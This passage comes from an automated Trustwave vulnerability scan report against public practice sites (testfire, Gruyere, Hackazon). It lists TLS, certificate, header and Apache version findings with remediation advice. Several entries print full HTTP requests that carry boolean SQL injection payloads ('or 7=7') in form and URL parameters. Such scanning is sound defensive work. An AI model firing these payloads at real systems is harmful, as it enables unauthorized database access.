CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 802 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 803 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 804 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 805 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 806 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 807 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 808 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 809 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 810 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 811 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Reference:
https://www.pcisecuritystandards.org/documents/Migrating_from_SSL_E
arly_TLS_Information%20Supplement_v1.pdf
https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%2
03%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-
Dead--An-Update-on-the-PCI-relevance-of-
SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA
Remediation:
The server should be configured to disable the use of the TLSv1.0
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 812 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
NOTE: Cipher block size must not be confused with key length. DES /
3DES ciphers are vulnerable because they always operate on 64 bit
blocks regardless of the key length. If this vulnerability is detected, and
in the list of detected ciphers you see only entries with numbers
different than 64 (eg. TLSv1 112 bits ECDHE-RSA-DES-CBC3-SHA), the
detection is still valid, because '112 bits' is the key length.
CVE: CVE-2016-2183
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 813 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Cipher Suite: TLSv1 : DES-CBC3-SHA
Cipher Suite: TLSv1_1 : DES-CBC3-SHA
Cipher Suite: TLSv1_2 : DES-CBC3-SHA
Remediation:
This issue can by avoided by disabling block ciphers of 64 bit block
length (like DES/3DES) in all the SSL/TLS servers. Exact procedure
depends on the actual implementation. Please refer to the
documentation of your SSL/TLS server software and actual service
software (http server, mail server, etc).
NOTE 1: This finding is based on a live test that actually detects which
ciphers are supported by the server. It is very important to note that in
many cases, a software update (backported version provided by
Operating System vendor or "vanilla" release taken directly from
SSL/TLS vendor) won't be enough to resolve this issue. Usually software
update doesn't overwrite manually tweaked configuration files, which
means, DES/3DES can be still available, even if the software update
disables them by default.
NOTE 3: If disabling 64 bit block ciphers is not possible, please limit the
number of requests client can make in a single TLS session and / or the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 814 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
3 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 4.3 Medium Fail Port: tcp/443
Vulnerable to CBC Attacks
via chosen-plaintext This server supports a version of SSL vulnerable to a Cipher Block
(BEAST) Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.
CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 815 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2 enabled by
default, disabling previous versions may prevent other services than
HTTP from connecting to the server if they do not support these
versions of TLS.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 816 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
http://www.kb.cert.org/vuls/id/464113
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 817 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.appspot.com
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 818 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
http://www.openssl.org/docs/apps/ciphers.html
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : AES128-SHA
Cipher Suite: TLSv1 : DES-CBC3-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : AES128-SHA
Cipher Suite: TLSv1_1 : DES-CBC3-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : AES128-SHA
Cipher Suite: TLSv1_2 : DES-CBC3-SHA
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 819 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Expiration Date: 2019-10-21 18:23:00 UTC
Days to expiration: 76
Remediation:
Contact your Certificate Authority (CA) to have a new certificate issued
prior to the expiration date. Please note the port associated with this
finding. This finding may NOT be originating from port 443, which is
what most online testing tools check by default.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 820 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.thinkwithgoogle.com
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 821 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
application_protocol: http
ip_address: 172.217.0.20
port_number: 80
transport_protocol: tcp
12 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 172.217.0.20
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 822 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
13 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 2607:F8B0:4009:813::2014
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Certificate Chain Depth: 0
Wildcard Subject Name: *.withyoutube.com
Remediation:
Review your certificate configurations to assure that wildcard
certificates are suitable for your application.
15 Host Detected 0.0 Info Pass This host responded to network probes.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 823 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 2607:F8B0:4009:813::2014
16 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: google-gruyere.appspot.com
ip_address: 172.217.0.20
17 Enumerated Hostnames 0.0 Info Pass This list contains all hostnames discovered during the scan that are
believed to belong to this host.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Hostname: app.google, Source: SSL Certificate Subject subjectAltName
DNS
Hostname: appspot.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: run.app, Source: SSL Certificate Subject subjectAltName
DNS
Hostname: thinkwithgoogle.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: withgoogle.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: withyoutube.com, Source: SSL Certificate Subject
subjectAltName DNS
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 824 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
No action is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
Verified: true
Today: 2019-08-05 21:55:42 -0500
Start date: 2019-07-29 18:32:34 UTC
End date: 2019-10-21 18:23:00 UTC
Expired: false
Fingerprint: F5:29:C8:4C:78:6F:F6:43:49:91:22:B7:02:C4:08:E2
Subject: /C=US/ST=California/L=Mountain View/O=Google
LLC/CN=*.appspot.com
Common name: *.appspot.com
Issuer: /C=US/O=Google Trust Services/CN=Google Internet Authority
G3
Signature Algorithm: sha256WithRSAEncryption
Version: 2
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 825 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
application_protocol: https
ip_address: 172.217.0.20
port_number: 443
ssl_enabled: true
transport_protocol: tcp
20 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
cpe: cpe:/h:linksys:befw11s4
ip_address: 172.217.0.20
os_name: embedded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 826 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://hackazon.webscantest.com/wishlist/new - type
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST https://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://hackazon.webscantest.com/wishlist
Origin: https://hackazon.webscantest.com
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 827 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
id=&name=New+Wish+List&type=or+7%3D7&_csrf_wishlist_add=Wz
up7LwI01S7dirlrNYtCePuKQ3QdAO9
True Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:15:41 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8
{"success":1,"id":"3188"}
False Request: POST https://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://hackazon.webscantest.com/wishlist
Origin: https://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=&name=New+Wish+List&type=or+7%3D6&_csrf_wishlist_add=Wz
up7LwI01S7dirlrNYtCePuKQ3QdAO9
False Response: HTTP/1.1 200 OK
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 828 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
{"success":1,"id":"3189"}
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 829 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVE-2017-3169 prior to 2.4.26 through 2.2.34 and 2.4.x prior to 2.4.26. These vulnerabilities are listed
CVE-2017-3167 below.
CVE-2017-7679 - mod_mime can read one byte past its' buffer when
used in a malicious Content-Type response header.
Reference:
https://httpd.apache.org/security/vulnerabilities_22.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 830 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Match: '2.4.7' is greater than or equal to '2.4.0'
Match: '2.4.7' is less than '2.4.26'
Remediation:
Upgrade to the most recent version of Apache HTTP Server 2.2.34 for
2.2 users or 2.4.26 for 2.4 users.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 831 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://hackazon.webscantest.com/wishlist/new - type
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=&name=New+Wish+List&type=or+7%3D7&_csrf_wishlist_add=U0z
tnjBA24QQ69yzqfMsDo0iHP4UVVo7
True Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:14:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 832 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
id=&name=New+Wish+List&type=or+7%3D6&_csrf_wishlist_add=U0z
tnjBA24QQ69yzqfMsDo0iHP4UVVo7
False Response: HTTP/1.1 200 OK
Date: Tue, 06 Aug 2019 04:14:50 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Content-Length: 25
Connection: close
Content-Type: application/json; charset=utf-8
{"success":1,"id":"2581"}
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 833 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 834 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://hackazon.webscantest.com/wishlist/new - id
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: POST http://hackazon.webscantest.com/wishlist/new
HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://hackazon.webscantest.com/wishlist
Origin: http://hackazon.webscantest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=or+7%3D7&name=New+Wish+List&type=private&_csrf_wishlist_a
dd=U0ztnjBA24QQ69yzqfMsDo0iHP4UVVo7
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 835 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
id=or+7%3D6&name=New+Wish+List&type=private&_csrf_wishlist_a
dd=U0ztnjBA24QQ69yzqfMsDo0iHP4UVVo7
{"success":1,"id":"2465"}
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 836 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 837 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
GET - https://hackazon.webscantest.com/product/view?id=or+7%3D6 -
id
False Injection: or 7=6
True Injection: or 7=7
True and false injections produced different responses
True Request: GET
https://hackazon.webscantest.com/product/view?id=or+7%3D7
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
